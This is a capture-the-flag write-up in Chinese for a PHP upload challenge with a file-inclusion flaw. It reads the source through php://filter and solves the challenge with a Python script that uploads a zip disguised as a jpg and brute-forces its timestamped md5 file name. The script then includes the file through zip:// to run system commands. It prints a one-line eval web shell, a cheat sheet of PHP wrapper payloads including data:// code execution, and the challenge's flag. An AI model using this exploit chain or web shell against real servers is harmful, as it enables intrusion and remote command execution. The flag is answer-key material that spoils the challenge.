题目内容提示：上传图片试试吧，注意统一时区问题

打开页面如图，源码没有过滤，随便输入，进入上传目录

根据链接可以看到是文件包含，可以利用编码读取源码，这里只列出有用页面的编码（?page=php://filter/read=convert.base64-encode/resource=upload

page=php://filter/read=convert.rot13/resource=upload）

PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiIgPg0KDQo8aGVhZD4NCiAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KICA8dGl0bGU+VXBsb2FkIEZvcm08L3RpdGxlPg0KDQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9tZXllci1yZXNldC8yLjAvcmVzZXQubWluLmNzcyI+DQoNCiAgPGxpbmsgcmVsPSdzdHlsZXNoZWV0JyBocmVmPSdodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9Um9ib3RvOjQwMCwxMDAsMzAwLDUwMCw3MDAsOTAwJz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0naHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU1vbnRzZXJyYXQ6NDAwLDcwMCc+DQo8bGluayByZWw9J3N0eWxlc2hlZXQnIGhyZWY9J2h0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vZm9udC1hd2Vzb21lLzQuMy4wL2Nzcy9mb250LWF3ZXNvbWUubWluLmNzcyc+DQoNCiAgICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL3N0eWxlLmNzcyI+DQoNCg0KPC9oZWFkPg0KDQo8Ym9keT4NCjw/cGhwDQogICAgJGVycm9yID0gIiI7DQogICAgJGV4dHMgPSBhcnJheSgianBnIiwicG5nIiwiZ2lmIiwianBlZyIpOw0KICAgIGlmKCFlbXB0eSgkX0ZJTEVTWyJpbWFnZSJdKSkNCiAgICB7DQogICAgICAgICR0ZW1wID0gZXhwbG9kZSgiLiIsICRfRklMRVNbImltYWdlIl1bIm5hbWUiXSk7DQogICAgICAgICRleHRlbnNpb24gPSBlbmQoJHRlbXApOw0KICAgICAgICBpZigoQCRfdXBmaWxlU1siaW1hZ2UiXVsic2l6ZSJdIDwgMTAyNDAwKSkNCiAgICAgICAgew0KICAgICAgICAgICAgaWYoaW5fYXJyYXkoJGV4dGVuc2lvbiwkZXh0cykpew0KICAgICAgICAgICAgICAkcGF0aCA9ICJ1cGxvYWRzLyIubWQ1KCR0ZW1wWzBdLnRpbWUoKSkuIi4iLiRleHRlbnNpb247DQogICAgICAgICAgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJpbWFnZSJdWyJ0bXBfbmFtZSJdLCAkcGF0aCk7DQogICAgICAgICAgICAgICRlcnJvciA9ICLkuIrkvKDmiJDlip8hIjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgZWxzZXsNCiAgICAgICAgICAgICRlcnJvciA9ICLkuIrkvKDlpLHotKXvvIEiOw0KICAgICAgICB9DQoNCiAgICAgICAgfWVsc2V7DQogICAgICAgICAgJGVycm9yID0gIuaWh+S7tui/h+Wkp++8jOS4iuS8oOWksei0pe+8gSI7DQogICAgICAgIH0NCiAgICB9DQoNCj8+DQo8ZGl2IGNsYXNzPSJmb3JtIj4NCiAgPGRpdiBjbGFzcz0idGh1bWJuYWlsIj48aW1nIHNyYz0iaGF0LnN2ZyIvPjwvZGl2Pg0KICA8Zm9ybSBjbGFzcz0ibG9naW4tZm9ybSIgYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+DQogICAgPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImltYWdlIiBwbGFjZWhvbGRlcj0iaW1hZ2UiLz4NCiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCI+bG9naW48L2J1dHRvbj4NCiAgPC9mb3JtPg0KICA8P3BocCBlY2hvICRlcnJvcjs/Pg0KPC9kaXY+DQo8c2NyaXB0IHNyYz0naHR0cDovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9qcXVlcnkvMi4xLjMvanF1ZXJ5Lm1pbi5qcyc+PC9zY3JpcHQ+DQoNCg0KDQo8c2NyaXB0ICBzcmM9ImpzL2luZGV4LmpzIj48L3NjcmlwdD4NCg0KDQoNCg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQo<!DOCTYPE html>
<html lang="en" ><head><meta charset="UTF-8"><title>Upload Form</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto:400,100,300,500,700,900'>
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Montserrat:400,700'>
<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css'><link rel="stylesheet" href="css/style.css"></head><body>
<?php$error = "";$exts = array("jpg","png","gif","jpeg");if(!empty($_FILES["image"])){$temp = explode(".", $_FILES["image"]["name"]);$extension = end($temp);if((@$_upfileS["image"]["size"] < 102400)){if(in_array($extension,$exts)){$path = "uploads/".md5($temp[0].time()).".".$extension;move_uploaded_file($_FILES["image"]["tmp_name"], $path);$error = "上传成功!";}else{$error = "上传失败！";}}else{$error = "文件过大，上传失败！";}}?>
<div class="form"><div class="thumbnail"><img src="hat.svg"/></div><form class="login-form" action="" method="post" enctype="multipart/form-data"><input type="file" name="image" placeholder="image"/><button type="submit">login</button></form><?php echo $error;?>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script  src="js/index.js"></script></body></html>

根据源码可以看到，上传文件限制了格式、大小、文件名，文件名更是加上时间戳，经过Md5加密，这样就扰乱了我们上传的链接地址。只能通过脚本来实现。

# -*- coding: UTF-8 -*-
import time
import requests
import hashlib
url = "http://ip:80/"
def md5(str):m = hashlib.md5()m.update(('shell'+str).encode())return m.hexdigest()
files = {"image":("shell.jpg",open("shell.jpg","rb"))#木马文件作为参数
}
t = int(time.time()+28800)#8个时区
requests.post(url=url+"index.php?page=upload",files=files)
for i in range(t-300,t+300):#遍历，找到上传的文件path = "uploads/"+md5(str(i))+".jpg"status = requests.get(url=url+path).status_codeif status == 200:print(path)break
data = {#"cmd":"system('ls /');""cmd":"system('cat /f11111111_ag');"
}
'''
file://        访问本地文件系统
http://        访问 HTTP(s) 网址
ftp://         访问 FTP(s) URLs
php://         访问各个输入/输出流（I/O streams）
zlib://        压缩流
data://        数据（RFC 2397）
glob://        查找匹配的文件路径模式
phar://        PHP 归档
ssh2://        Secure Shell 2
rar://         RAR
ogg://         音频流
expect://      处理交互式的流php://filter
读取文件源码
php://filter可获取指定文件源码，如果再利用包含函数漏洞，php://filter流会被当作php文件执行，
一般对其进行编码，使其不被执行，获取到编码后解码，从而达到任意文件的读取
……?file=php://filter/read=convert.base64-encode/resource=文件路径
……?file=php://filter/write=convert.base64-encode/resource=文件路径data://  数据流封装器，以传递相应格式的数据，可以用来执行PHP代码
data://text/plain，内容
data://text/plain;base64,base64加密内容
……?file=data://text/plain,<?php%20phpinfo();?>
……?file=data://text/plain;base64,base64加密后内容压缩文件为协议用法：用于读取压缩文件，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可修改为任意后缀
phar://[压缩文件路径]/[压缩文件内的子文件名]
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]（%23为#）
compress.bzip2://file.bz2
示例：
1、将php文件添加到压缩文件中（phar）
……?file=phar://D:/……1.zip/1.php
2、将php文件添加到1.zip中，并将1.zip重命名为1.jpg，再上传到目标服务器（zip）
……?file=zip://D:/……1.jpg%231.php
3、压缩1.php为1.bz2（bzip2）
……?file=compress.bzip2://D:/……1.bz2
'''
requrl=url=url+"index.php?page=zip://"+path+"%23shell"
print(requrl)
content = requests.post(url=requrl,data=data).content
#协议里说是绝对路径，但是linux下不可以访问，在本地windows下必须用绝对路径，相对路径不行
#content = requests.post(url=url+"index.php?page=zip:///var/www/html/"+path,data=data).content
print (content)

这道题非常难，知识点非常多，文件包含，伪协议，命令执行，木马上传，重点是为协议任意格式文件读取。环节很多，浪费了很长时间。

<?php @eval($_POST['cmd']); ?> 压缩为zip格式文件

flag{3809f2ce999b4d99c8051e285505a014}